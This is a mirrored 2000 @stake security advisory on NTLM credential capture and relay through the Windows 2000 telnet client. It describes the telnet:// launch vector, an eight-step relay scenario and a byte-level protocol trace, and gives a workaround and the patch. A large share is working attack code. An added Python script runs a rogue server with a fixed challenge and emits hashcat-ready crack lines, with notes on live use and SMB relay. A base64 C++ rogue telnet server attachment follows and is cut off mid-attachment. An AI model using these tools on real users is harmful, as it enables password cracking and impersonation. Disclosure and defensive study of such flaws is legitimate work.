[ SOURCE: http://www.secureroot.com/security/advisories/9693910683.html ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I wish this could have gone out sooner, but there was an issue with the
initial Microsoft patch which we found during our testing. They
subsequently decided to fix the patch, which delayed things a bit. We feel
that if a vendor is taking an issue seriously and working diligently on a
patch, we should hold off on vulnerability details and demonstration code
until they have a chance to complete the fix properly.

Be advised that the URLs included in the Vendor Response section of our
advisory may not have replicated to all the Microsoft web servers yet.

Weld Pond
weld@atstake.com
@stake Inc.
www.atstake.com


                                @stake Inc.
                             Security Advisory

Advisory Name: NTLM Replaying via Windows 2000 Telnet Client (A091400-1)
 Release Date: 09/14/2000
  Application: Windows 2000 Telnet Client
     Platform: Windows 2000
     Severity: Attacker can impersonate users on the network
       Author: DilDog [dildog@atstake.com]
Vendor Status: Vendor has patch
          Web: www.atstake.com/research/advisories/2000/a091400-1.txt


Executive Summary:

The telnet client in Windows 2000 may be launched via e-mail or web
browsing, causing undesirable outbound authentication over the Internet to
an untrusted third party. This can lead to compromised passwords or stolen
credentials.


Overview:

The console telnet client that is packaged with Windows 2000 performs NTLM
authentication by default, assuming that it is going to be connecting to a
Windows 2000 telnet server. This, however, is not necessarily the case, and
it attempts authentication with any host it contacts. Combined with the
fact that many e-mail and web browser packages will parse the "telnet://"
protocol and launch the telnet client to the desired host, this can lead to
outbound NTLM authentications. These authentications can be cracked to
determine passwords, or replayed to illegitimately access networked
resources.
The protocol used in the NTLM telnet transaction is described in detail
below, and a proof of concept tool is provided that demonstrates the
negotiation and logs responses from the client.


Detailed Description:

Windows 2000 is packaged with a console mode telnet client, specially
designed for connecting to the Windows Telnet Server. Amongst the
modifications to the standard telnet protocol, Microsoft has added a
negotiation type to authenticate via NTLM with the target server, per the
IETF working draft of the telnet AUTHENTICATION option (since published as
RFC 2941):

    http://www.ietf.org/internet-drafts/draft-tso-telnet-auth-enc-05.txt

The NTLM protocol is authentication type 15.

The telnet client will attempt negotiation with any server on the Internet,
regardless of zone control or otherwise, unless NTLM authentication has
been disabled in the telnet client (it is on by default). Initially, this
seems benign, but Microsoft Internet Explorer, Outlook, Outlook Express,
and Netscape Navigator and Messenger will all open telnet automatically
when they encounter a "telnet://" URL. This allows an attacker to craft an
e-mail that forces an outbound authentication to a host and port of the
attacker's choosing. (The sample message from the original advisory is
missing from this copy.)

Note that this attack affects a multitude of HTML parsers, and is not
reliant upon any form of Active Scripting, JavaScript or otherwise, to
launch the telnet client to the desired host.

One of the severe ramifications of this is the ability for the NTLM
challenge/response to be replayed to access a network resource. The
scenario is as follows:

  A=attacker
  C=client
  S=server (network resource to attack)
  C has legitimate access to S

  1. 'A' sends evil framed email to 'C'.
  2. 'C' reads email, opens telnet connection to 'A'.
  3. 'A' receives telnet connection and makes SMB connection to 'S'.
  4. 'S' receives SMB connection and sends challenge to 'A'.
  5. 'A' sends challenge to 'C'.
  6. 'C' receives challenge, encrypts with hash, and sends response to 'A'.
  7. 'A' receives response and sends it to 'S'.
  8. 'S' receives response and authenticates 'A' to access requested SMB
     share.

The relay works because the response 'C' computes depends only on what 'S'
put in its challenge and on the user's password hash; nothing binds it to
the telnet connection it was obtained over, and 'A' never needs the hash
itself, only the one live session it borrows.

Another attack that is possible is that, since the challenge is chosen by
the telnet server, a challenge could be specially chosen to send to the
telnet client such that the response is more easily cracked than with a
random challenge. This effectively removes the extra complexity added by
the challenge/response mechanism that one normally encounters while
attempting to crack passwords that were sniffed off of a network
transaction. With a constant challenge, the LM and NTLM responses become a
fixed function of the password hash: they can be precomputed once and
looked up, and two users with the same password produce the same response.

The normal NTLM challenge/response negotiation sequence occurs in the
telnet protocol data stream in the following fashion:

Nomenclature
============

  IAC=255, DONT=254, DO=253, WONT=252, WILL=251, SB=250, SE=240
  AUTH=37, IS=0, SEND=1, REPLY=2, NAME=3, NTLM=15

  DD = 32 bit little endian data
  DW = 16 bit little endian data
  DB = 8 bit data
  US = Unicode string, no extra null terminator
  AS = Ansi string, no extra null terminator

(The field names in the trace are the advisory's reverse-engineered labels.
In the NTLMSSP terms Microsoft later documented in MS-NLMP, the "Sequence
#" is the message type (1 = NEGOTIATE, 2 = CHALLENGE, 3 = AUTHENTICATE),
the "?Flags?" are the NegotiateFlags, and each "length (min/max)" plus
"offset" pair is a Len/MaxLen/BufferOffset descriptor for a variable-length
field; in the CHALLENGE message the first descriptor is the TargetName and
the "next field" at 0x44 is the TargetInfo list of AV pairs.)

Client                              Server
==================================  ==================================
IAC WILL AUTH
                                    IAC SB AUTH SEND NTLM 0x00 IAC SE
IAC SB AUTH IS NTLM 0x00 0x00
  DD 0x00000020     ; Length
  DD 0x00000002     ; Type
  AS "NTLMSSP\0"    ; Signature
  DD 0x00000001     ; Sequence #
  DD 0xE0008297     ; ?Flags?
  DD 0x00000000     ; Padding (room for client challenge?)
  DD 0x00000000
  DD 0x00000000
  DD 0x00000000
IAC SE
                                    IAC SB AUTH REPLY NTLM 0x00 0x01
                                      DD 0x000000A8     ; Length
                                      DD 0x00000002     ; Type
                                      AS "NTLMSSP\0"    ; Signature
                                      DD 0x00000002     ; Sequence #
                                      DW 0x0014,0x0014  ; Field length (min/max)
                                      DD 0x00000030     ; Offset from start
                                      DD 0xE0828295     ; ?Flags?
                                      DB 0x01 0x02 0x03 0x04 ; 8 byte
                                      DB 0x02 0x03 0x04 0x05 ; Challenge
                                      DD 0x00000000     ; Padding
                                      DD 0x00000000
                                      DW 0x0064,0x0064  ; Next Field length (min/max)
                                      DD 0x00000044     ; Offset from start
                                      ... other fields ...
IAC SB AUTH IS NTLM 0x00 0x02
  DD 0x000000B4     ; Length
  DD 0x00000002     ; Type
  AS "NTLMSSP\0"    ; Signature
  DD 0x00000003     ; Sequence #
  DW 0x0018,0x0018  ; NTLM Response Field length (min/max)
  DD 0x00000074     ; NTLM Response Offset
  DW 0x0018,0x0018  ; LM Response Field length (min/max)
  DD 0x0000008C     ; LM Response Offset
  DW 0x0014,0x0014  ; Domain Name Field length (min/max)
  DD 0x00000040     ; Domain Name Offset
  DW 0x000C,0x000C  ; User Name Field length (min/max)
  DD 0x00000054     ; User Name Offset
  DW 0x0014,0x0014  ; Machine Name Field length (min/max)
  DD 0x00000060     ; Machine Name Offset
  DW 0x0010,0x0010  ; ??? Field length (min/max)
  DD 0x000000A4     ; ??? Offset
  DD 0xE0808295     ; ?Flags?
  US "ABCDEGHIJK"   ; Domain Name
  US "foobar"       ; User Name
  US "ABCDEGHIJK"   ; Machine Name
  DB 1,2,3,4,5,6,7,8 ; 24 Bytes of NTLM Response
  DB 1,2,3,4,5,6,7,8
  DB 1,2,3,4,5,6,7,8
  DB 1,2,3,4,5,6,7,8 ; 24 Bytes of LM Response
  DB 1,2,3,4,5,6,7,8
  DB 1,2,3,4,5,6,7,8
  DB 1,2,3,4,5,6,7,8 ; 16 Bytes of Unknown Cruft
  DB 1,2,3,4,5,6,7,8
IAC SE
                                    IAC SB AUTH REPLY NTLM 0x00 0x03
                                      DD 0xFDFFF0FF     ; Flags?
                                      DB 0x18 ....

(Caveat for anyone feeding the captured values to a password cracker: in
MS-NLMP the AUTHENTICATE message carries the LM response descriptor first
and the NT response descriptor second, so the 24 bytes at offset 0x74 are
the LM response and the 24 bytes at 0x8C the NTLM response, the reverse of
the labels above; the 16 "unknown" bytes at 0xA4 are the
EncryptedRandomSessionKey. The attached tool logs the two responses under
the advisory's labels, so its "NT Response" column holds the LM response.)


Temporary Solution:

Run "telnet" at the command prompt, enter "unset ntlm" and then exit
telnet to save your preferences into the registry. This is a per-user
preference, so it must be repeated for every account on the machine that
reads mail or browses. You may go so far as removing the telnet URL type
from the registry if you are a proficient registry hacker; unsetting the
NTLM authentication should be sufficient until an official patch is
available.


Vendor Response:

Microsoft has released a bulletin and patch for this issue.

  Bulletin MS00-067
  http://www.microsoft.com/technet/security/bulletin/MS00-067.asp

  Frequently Asked Questions:
  http://www.microsoft.com/technet/security/bulletin/fq00-067.asp

  Patch:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24319


Proof-of-Concept Code:

This code will act as a rogue telnet server, and send a constant challenge
of 0xFF bytes to any telnet client that connects to it, and it logs the
response to a disk file. The code was written under Linux.

The attachment below is base64-encoded; decode it to talkntlm.cpp and
build it with g++. It is invoked as "talkntlm -t [-p <port>] -l <logfile>"
(port 23 if -p is omitted) and appends one line per captured client in the
form user:domain:challenge:response:response, with the challenge and both
responses in hex. Two things to be aware of when using it: the domain
column is written from the user-name buffer after that buffer has been
freed (a slip in the domain loop), so take the domain from the console
output instead; and the tool reads and writes subnegotiation data raw,
without the IAC doubling of a literal 0xFF that RFC 854 requires, so a
response containing a 0xFF byte can desynchronise it.
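The exchange in the trace, worked through in code. The script below is an added example written for this page; it is not the advisory's talkntlm tool and not @stake's code. It produces the server side of the negotiation (IAC DO AUTH, the SEND offer, and the CHALLENGE frame laid out exactly as in the trace, including the four AV pairs the PoC sends), parses a client's AUTHENTICATE reply using the MS-NLMP descriptor order (LM response first, NT response second), and emits a user::domain:LM:NT:challenge line in the NETNTLMv1 layout that hashcat mode 5500 takes. It also un-doubles IAC IAC inside subnegotiation data, which the PoC does not do. The client reply it parses is constructed from the placeholder values in the trace, not a capture from a real Windows 2000 client. For the relay in steps 3 to 7, build_challenge() would be fed the 8-byte challenge lifted out of 'S's own CHALLENGE message instead of a constant, and the parsed lm_response and nt_response would be copied into the SMB session setup sent to 'S'; that SMB side is described here, not implemented.

```python
# Telnet AUTHENTICATION option (37) carrying NTLMSSP, laid out as in the trace above.
import struct

IAC, SB, SE, DO = 255, 250, 240, 253
AUTH, IS, SEND, REPLY, NTLM = 37, 0, 1, 2, 15
NTLMSSP = b"NTLMSSP\0"

def sb_frame(body):
    """IAC SB AUTH <body> IAC SE; a literal 0xFF is sent as IAC IAC (RFC 854)."""
    return bytes([IAC, SB, AUTH]) + body.replace(b"\xff", b"\xff\xff") + bytes([IAC, SE])

def read_sb(stream):
    """Take one IAC SB ... IAC SE block off stream (un-doubling IAC IAC); returns (body, rest)."""
    if stream[:2] != bytes([IAC, SB]):
        raise ValueError("expected IAC SB")
    out, i = bytearray(), 2
    while i < len(stream):
        if stream[i] != IAC:
            out.append(stream[i]); i += 1
        elif i + 1 >= len(stream):
            break
        elif stream[i + 1] == IAC:
            out.append(IAC); i += 2
        elif stream[i + 1] == SE:
            return bytes(out), stream[i + 2:]
        else:
            raise ValueError("unexpected IAC %d inside subnegotiation" % stream[i + 1])
    raise ValueError("truncated subnegotiation")

def offer_ntlm():
    """Server -> client: IAC DO AUTH, then offer authentication type 15 (NTLM)."""
    return bytes([IAC, DO, AUTH]) + sb_frame(bytes([SEND, NTLM, 0]))

def build_challenge(challenge, target="ABCDEGHIJK"):
    """Server -> client CHALLENGE, the trace's 'REPLY NTLM 0x00 0x01' block, with the
    four AV pairs (ids 2,1,4,3: NetBIOS domain/computer, DNS domain/computer) the PoC sends."""
    assert len(challenge) == 8
    name = target.encode("utf-16-le")
    av = b"".join(struct.pack("<HH", i, len(name)) + name for i in (2, 1, 4, 3))
    av += struct.pack("<HH", 0, 0)                                  # MsvAvEOL
    msg = (NTLMSSP + struct.pack("<I", 2)                           # signature, MessageType 2
           + struct.pack("<HHI", len(name), len(name), 48)          # TargetName descriptor
           + struct.pack("<I", 0xE0828295) + challenge + b"\0" * 8  # flags, ServerChallenge, Reserved
           + struct.pack("<HHI", len(av), len(av), 48 + len(name))  # TargetInfo descriptor
           + name + av)
    # telnet-side prefix as in the trace: 32-bit length of the blob, then 32-bit "type" 2
    return sb_frame(bytes([REPLY, NTLM, 0, 1]) + struct.pack("<II", len(msg), 2) + msg)

def build_authenticate(domain, user, workstation, lm_resp, nt_resp, session_key, flags=0xE0808295):
    """Client -> server AUTHENTICATE; used here only to construct a sample reply.
    Descriptors: LM, NT, domain, user, workstation, key. Payload: domain, user, workstation, LM, NT, key."""
    dom, usr, wks = (s.encode("utf-16-le") for s in (domain, user, workstation))
    payload = [dom, usr, wks, lm_resp, nt_resp, session_key]
    where, off = {}, 64                                             # payload begins at 0x40
    for key, data in zip(("dom", "usr", "wks", "lm", "nt", "key"), payload):
        where[key], off = off, off + len(data)
    fields = b"".join(struct.pack("<HHI", len(d), len(d), where[k]) for k, d in
                      (("lm", lm_resp), ("nt", nt_resp), ("dom", dom), ("usr", usr),
                       ("wks", wks), ("key", session_key)))
    msg = NTLMSSP + struct.pack("<I", 3) + fields + struct.pack("<I", flags) + b"".join(payload)
    return sb_frame(bytes([IS, NTLM, 0, 2]) + struct.pack("<II", len(msg), 2) + msg)

def parse_authenticate(sb):
    """Parse 'AUTH IS NTLM 0x00 0x02 <len> <type> NTLMSSP...' (the bytes between IAC SB and
    IAC SE). Descriptor order per MS-NLMP: LM response first, NT response second."""
    if sb[:5] != bytes([AUTH, IS, NTLM, 0, 2]):
        raise ValueError("not an NTLM 'AUTH IS' reply")
    length, kind = struct.unpack_from("<II", sb, 5)
    blob = sb[13:13 + length]
    if kind != 2 or blob[:8] != NTLMSSP or struct.unpack_from("<I", blob, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    out = {}
    for n, name in enumerate(("lm_response", "nt_response", "domain", "user",
                              "workstation", "session_key")):
        ln, _maxlen, off = struct.unpack_from("<HHI", blob, 12 + 8 * n)
        out[name] = blob[off:off + ln]
    out["flags"] = struct.unpack_from("<I", blob, 60)[0]
    for name in ("domain", "user", "workstation"):
        out[name] = out[name].decode("utf-16-le")
    return out

def netntlm_line(auth, challenge):
    """user::domain:LM:NT:challenge, the NETNTLMv1 layout hashcat mode 5500 takes."""
    return "%s::%s:%s:%s:%s" % (auth["user"], auth["domain"], auth["lm_response"].hex(),
                                auth["nt_response"].hex(), challenge.hex())

def demo():
    """Constructed exchange: the PoC's fixed all-0xFF challenge and a reply carrying the
    placeholder values from the trace (not a capture from a real client)."""
    challenge = b"\xff" * 8
    server_side = offer_ntlm() + build_challenge(challenge)
    reply = build_authenticate("ABCDEGHIJK", "foobar", "ABCDEGHIJK", bytes(range(1, 9)) * 3,
                               bytes(range(1, 9)) * 3, bytes(range(1, 9)) * 2)
    auth = parse_authenticate(read_sb(reply)[0])
    return auth, netntlm_line(auth, challenge), server_side

if __name__ == "__main__":
    print(demo()[1])
```

Running it prints the crack line for the constructed reply. Against a live client the same functions form the loop the attached C++ tool implements: write offer_ntlm() and build_challenge() to the accepted socket, then pull the client's subnegotiations off the socket with read_sb() and hand the AUTH IS block to parse_authenticate(). Because the all-0xFF challenge is doubled on the wire by sb_frame(), the frame is eight bytes longer than the 0xA8 length field suggests; read_sb() undoes that before the length is interpreted.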
===================== Content-Description: NTLM Rogue Telnet Server Content-Disposition: attachment; filename="talkntlm.cpp" Content-Transfer-Encoding: BASE64 Content-Type: text/plain LyogVGFsa05UTE0gLSBOVExNIExvZ2dpbmcgVGVsbmV0IFNlcnZlcgogKiBkaWxkb2dAYXRz dGFrZS5jb20KICogOC8xNC8wMAogKiBDb3B5cmlnaHQgKEMpIDIwMDAgQHN0YWtlLCBJbmMu CiAqLwoKI2luY2x1ZGU8c3RkaW8uaD4KI2luY2x1ZGU8c3RyaW5nLmg+CiNpbmNsdWRlPHVu aXN0ZC5oPgojaW5jbHVkZTxzdGRsaWIuaD4KI2luY2x1ZGU8Y3R5cGUuaD4KI2luY2x1ZGU8 c3lzL3NvY2tldC5oPgojaW5jbHVkZTxzeXMvdHlwZXMuaD4KI2luY2x1ZGU8c3lzL3dhaXQu aD4KI2luY2x1ZGU8bmV0aW5ldC9pbi5oPgojaW5jbHVkZTxhcnBhL2luZXQuaD4KCiNkZWZp bmUgTUFKT1JfVkVSU0lPTiAxCiNkZWZpbmUgTUlOT1JfVkVSU0lPTiAwCgojZGVmaW5lIElB QyAgICAgMjU1ICAgICAgICAgICAgIC8qIGludGVycHJldCBhcyBjb21tYW5kOiAqLwojZGVm aW5lIERPTlQgICAgMjU0ICAgICAgICAgICAgIC8qIHlvdSBhcmUgbm90IHRvIHVzZSBvcHRp b24gKi8KI2RlZmluZSBETyAgICAgIDI1MyAgICAgICAgICAgICAvKiBwbGVhc2UsIHlvdSB1 c2Ugb3B0aW9uICovCiNkZWZpbmUgV09OVCAgICAyNTIgICAgICAgICAgICAgLyogSSB3b24n dCB1c2Ugb3B0aW9uICovCiNkZWZpbmUgV0lMTCAgICAyNTEgICAgICAgICAgICAgLyogSSB3 aWxsIHVzZSBvcHRpb24gKi8KI2RlZmluZSBTQiAgICAgIDI1MCAgICAgICAgICAgICAvKiBp bnRlcnByZXQgYXMgc3VibmVnb3RpYXRpb24gKi8gICAgICAgICAgICAgIAojZGVmaW5lIFNF ICAgICAgMjQwICAgICAgICAgICAgIC8qIGVuZCBzdWIgbmVnb3RpYXRpb24gKi8KI2RlZmlu ZSBBVVRIICAgIDM3CiNkZWZpbmUgSVMgICAgICAwCiNkZWZpbmUgU0VORCAgICAxCiNkZWZp bmUgUkVQTFkgICAyCiNkZWZpbmUgTkFNRSAgICAzCiNkZWZpbmUgTlRMTSAgICAxNQoKI2Rl ZmluZSBBQ0NFUFQgMQoKdHlwZWRlZiBlbnVtIHsKICBNRVRIT0RfTk9ORT0wLAogIE1FVEhP RF9URUxORVQKfSBNRVRIT0Q7Cgp0eXBlZGVmIGVudW0gewogIFNVQk1FVEhPRF9OT05FPTAs CiAgU1VCTUVUSE9EX0xPRywKfSBTVUJNRVRIT0Q7CgojZGVmaW5lIENPTU1TT0NLX0JVRlNJ WiAyMDQ4CkZJTEUgKmdfZkNvbW1Tb2NrOwpjaGFyIGdfQ29tbVNvY2tCdWZbQ09NTVNPQ0tf QlVGU0laXTsKCnZvaWQgZXJyb3IoY29uc3QgY2hhciAqc3RyKQp7CiAgZmZsdXNoKHN0ZG91 dCk7CiAgZnByaW50ZihzdGRlcnIsc3RyKTsKICBmZmx1c2goc3RkZXJyKTsKfQoKdW5zaWdu ZWQgY2hhciBnZXRiKHZvaWQpCnsKICB1bnNpZ25lZCBjaGFyIGI9MDsKICBmcmVhZCgmYiwx 
LDEsZ19mQ29tbVNvY2spOwogIHJldHVybiBiOwp9Cgp1bnNpZ25lZCBzaG9ydCBnZXRkd2wo dm9pZCkKewogIHVuc2lnbmVkIHNob3J0IHM9MDsKICBzfD0oKHVuc2lnbmVkIHNob3J0KWdl dGIoKSk7CiAgc3w9KCh1bnNpZ25lZCBzaG9ydClnZXRiKCkpPDw4OwogIHJldHVybiBzOwp9 Cgp1bnNpZ25lZCBsb25nIGdldGRkbCh2b2lkKQp7CiAgdW5zaWduZWQgbG9uZyBsPTA7CiAg bHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIo KSk8PDg7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk8PDE2OwogIGx8PSgodW5zaWdu ZWQgbG9uZylnZXRiKCkpPDwyNDsKICByZXR1cm4gbDsKfQoKdm9pZCBwdXRiKHVuc2lnbmVk IGNoYXIgYykKewogIGZ3cml0ZSgmYywxLDEsZ19mQ29tbVNvY2spOwp9Cgp2b2lkIHB1dGR3 bCh1bnNpZ25lZCBzaG9ydCB3KQp7CiAgcHV0Yih3JjI1NSk7CiAgcHV0Yigodz4+OCkmMjU1 KTsKfQoKdm9pZCBwdXRkZGwodW5zaWduZWQgbG9uZyBkKQp7CiAgcHV0YihkJjI1NSk7CiAg cHV0YigoZD4+OCkmMjU1KTsKICBwdXRiKChkPj4xNikmMjU1KTsKICBwdXRiKChkPj4yNCkm MjU1KTsKfQoKCnZvaWQgcHV0YXJyYihpbnQgbiwgdW5zaWduZWQgY2hhciAqYikKewogIGlu dCBpOwogIGZvcihpPTA7aTxuO2krKykgewogICAgcHV0YihiW2ldKTsKICB9Cn0KCnZvaWQg cHV0YXJyYyhpbnQgbiwgY2hhciAqYykKewogIHB1dGFycmIobiwodW5zaWduZWQgY2hhciAq KWMpOwp9Cgp2b2lkIHB1dGZsdXNoKHZvaWQpCnsKICBmZmx1c2goZ19mQ29tbVNvY2spOwp9 CgoKdm9pZCBkZWJ1Z2IodW5zaWduZWQgY2hhciBjKQp7CiAgZnByaW50ZihzdGRlcnIsIiVk XHRcdCVYXHQnJWMnXG5cciIsYyxjLChpc2FsbnVtKGMpP2M6JyAnKSk7Cn0KCgppbnQgbGlz dGVucG9ydChpbnQgcG9ydCwgc3RydWN0IHNvY2thZGRyX2luICpyc2FkZHIpCnsKICAvLyBD cmVhdGUgc29ja2V0CiAgaW50IHM9c29ja2V0KEFGX0lORVQsU09DS19TVFJFQU0sSVBQUk9U T19UQ1ApOwogIGlmKHM8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGNyZWF0ZSBzb2NrZXQu XG4iKTsKICAgIHJldHVybiAtMTsKICB9CgogIGludCByZXVzZT0xOwogIGlmKHNldHNvY2tv cHQocyxTT0xfU09DS0VULFNPX1JFVVNFQUREUiwmcmV1c2Usc2l6ZW9mKGludCkpPDApIHsK ICAgIGVycm9yKCJjb3VsZG4ndCBzZXQgc29ja2V0IG9wdGlvbi5cbiIpOwogICAgY2xvc2Uo cyk7CiAgICByZXR1cm4gLTI7CiAgfQoKICAvLyBCaW5kIHRvIHBvcnQKICBzdHJ1Y3Qgc29j a2FkZHJfaW4gc2FkZHI7CiAgbWVtc2V0KCZzYWRkciwwLHNpemVvZihzdHJ1Y3Qgc29ja2Fk ZHJfaW4pKTsKICBzYWRkci5zaW5fcG9ydD1odG9ucyhwb3J0KTsKICBzYWRkci5zaW5fZmFt aWx5PUFGX0lORVQ7CiAKICBpZihiaW5kKHMsKHN0cnVjdCBzb2NrYWRkciAqKSZzYWRkcixz 
aXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGJp bmQuXG4iKTsKICAgIGNsb3NlKHMpOwogICAgcmV0dXJuIC0zOwogIH0KCiAgLy8gTGlzdGVu IG9uIHBvcnQ7CiAgaWYobGlzdGVuKHMsMSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGxp c3Rlbi5cbiIpOwogICAgY2xvc2Uocyk7CiAgICByZXR1cm4gLTQ7CiAgfQoKICAvLyBBY2Nl cHQgY29ubmVjdGlvbgogIHVuc2lnbmVkIGludCBzb2NrbGVuPXNpemVvZihzdHJ1Y3Qgc29j a2FkZHJfaW4pOwogIG1lbXNldChyc2FkZHIsMCxzb2NrbGVuKTsKICBpbnQgYXM7CiAgaWYo KGFzPWFjY2VwdChzLChzdHJ1Y3Qgc29ja2FkZHIgKilyc2FkZHIsJnNvY2tsZW4pKTwwKSB7 CiAgICBlcnJvcigiY291bGRuJ3QgYWNjZXB0LlxuIik7CiAgICBjbG9zZShzKTsKICAgIHJl dHVybiAtNTsKICB9CgogIC8vIENsb3NlIGxpc3RlbmVyCiAgY2xvc2Uocyk7CiAgCiAgcmV0 dXJuIGFzOwp9CgppbnQgZG9fdGVsbmV0X2xvZyhpbnQgcG9ydCwgY2hhciAqbG9nZmlsZSkK ewoKICBGSUxFICpsZj1OVUxMOwoKICB3aGlsZSgxKSB7CiAgICAKICAgIC8vIFdhaXQgZm9y IHRlbG5ldCBjb25uZWN0aW9uIHRvIGNvbWUgaW4KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBz YWRkcjsKICAgIGludCBzOwogICAgcHJpbnRmKCJsaXN0ZW5pbmcgb24gcG9ydCAlZC5cbiIs cG9ydCk7CiAgICBpZigocz1saXN0ZW5wb3J0KHBvcnQsJnNhZGRyKSk8MCkgewogICAgICBl cnJvcigidGVsbmV0IGxvZ2dpbmcgYWJvcnQuXG4iKTsKICAgICAgcmV0dXJuIC0xOwogICAg fQogICAgcHJpbnRmKCJyZWNpZXZlZCB0ZWxuZXQgY29ubmVjdGlvbiBmcm9tICVzOiV1Llxu IiwKCSAgIGluZXRfbnRvYShzYWRkci5zaW5fYWRkciksbnRvaHMoc2FkZHIuc2luX3BvcnQp KTsKCiAgICAvLyBTZXQgdGhpcyBzb2NrZXQgYXMgb3V0IGJ1ZmZlcmVkIHBhY2tldCBzb2Nr ZXQKICAgIGdfZkNvbW1Tb2NrPWZkb3BlbihzLCJyK2IiKTsKICAgIGlmKGdfZkNvbW1Tb2Nr PT1OVUxMKSB7CiAgICAgIGVycm9yKCJjb3VsZG4ndCBmZG9wZW4gY29tbSBzb2NrZXQuXG4i KTsKICAgICAgY2xvc2Uocyk7CiAgICAgIHJldHVybiAtMjsKICAgIH0KICAgIHNldHZidWYo Z19mQ29tbVNvY2ssZ19Db21tU29ja0J1ZixfSU9GQkYsQ09NTVNPQ0tfQlVGU0laKTsKCiAg ICAvLyBPcGVuIGxvZ2dpbmcgZmlsZQogICAgbGY9Zm9wZW4obG9nZmlsZSwiYSt0Iik7CiAg ICBpZihsZj09TlVMTCkgewogICAgICBlcnJvcigiY291bGRuJ3Qgb3BlbiBsb2cgZmlsZS5c biIpOwogICAgICBmY2xvc2UoZ19mQ29tbVNvY2spOwogICAgICByZXR1cm4gLTM7CiAgICB9 CiAgICAKICAgIC8vIENoYWxsZW5nZSB0byBzZW5kCiAgICB1bnNpZ25lZCBjaGFyIGNoYWxs ZW5nZVs4XT17MjU1LDI1NSwyNTUsMjU1LDI1NSwyNTUsMjU1LDI1NX07CgogICAgLy8gU3Rh 
cnQgYXV0aGVudGljYXRpb24gcHJvY2VzcwogICAgdW5zaWduZWQgY2hhciAqcmVzcGJ1Zj1O VUxMOwogICAgaW50IHNpemU9MDsKICAgIAogICAgcHV0YihJQUMpOwogICAgcHV0YihETyk7 CiAgICBwdXRiKEFVVEgpOwogICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIERP IEFVVEhcbiIpOwogICAgCiAgICAvLyBTZWUgaWYgY2xpZW50IHdhbnRzIHRvIGF1dGhlbnRp Y2F0ZQogICAgaWYoZ2V0YigpIT1JQUMpIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdl dGIoKSE9V0lMTCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBn b3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBwcmludGYoIjw8IElBQyBXSUxMIEFVVEhcbiIpOwog ICAgCiAgICAvLyBQcmVzZW50IGF1dGhlbnRpY2F0aW9uIG1ldGhvZHMKICAgIHB1dGIoSUFD KTsKICAgIHB1dGIoU0IpOwogICAgcHV0YihBVVRIKTsKICAgIHB1dGIoU0VORCk7CiAgICBw dXRiKE5UTE0pOwogICAgcHV0YigwKTsKICAgIHB1dGIoSUFDKTsKICAgIHB1dGIoU0UpOwog ICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIFNCIEFVVEggU0VORCBOVExNIDAg SUFDIFNFXG4iKTsKICAgIAogICAgLy8gR2V0IE5UTE1TU1AgaW5pdGlhbCByZXF1ZXN0CiAg ICBpZihnZXRiKCkhPUlBQykgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1T QikgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBnb3RvIHRlbG5l dGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUlTKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBp ZihnZXRiKCkhPU5UTE0pIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9MCkg Z290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2Zh aWw7CiAgICAKICAgIHNpemU9Z2V0ZGRsKCkrNDsKICAgIGlmKHNpemU+MjA0OCkgZ290byB0 ZWxuZXRsb2dmYWlsOwogICAgcmVzcGJ1Zj0odW5zaWduZWQgY2hhciAqKW1hbGxvYyhzaXpl KTsKICAgIGludCBpOwogICAgZm9yKGk9MDtpPHNpemU7aSsrKSB7CiAgICAgIHJlc3BidWZb aV09Z2V0YigpOwogICAgfQogICAgZnJlZShyZXNwYnVmKTsKICAgIGlmKGdldGIoKSE9SUFD KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNFKSBnb3RvIHRlbG5ldGxv Z2ZhaWw7CiAgICAKICAgIHByaW50ZigiPDwgSUFDIFNCIEFVVEggSVMgTlRMTSAwIDAgLi4u IElBQyBTRVxuIik7CiAgICAKICAgIC8vIFNlbmQgYWNjZXB0CiAgICBwdXRiKElBQyk7CiAg ICBwdXRiKFNCKTsKICAgIHB1dGIoQVVUSCk7CiAgICBwdXRiKFJFUExZKTsKICAgIHB1dGIo TlRMTSk7CiAgICBwdXRiKDApOwogICAgcHV0YihBQ0NFUFQpOwogICAgCiAgICBwdXRkZGwo MHhBOCk7CiAgICBwdXRkZGwoMHgyKTsKICAgIHB1dGFycmMoOCwiTlRMTVNTUCIpOwogICAg 
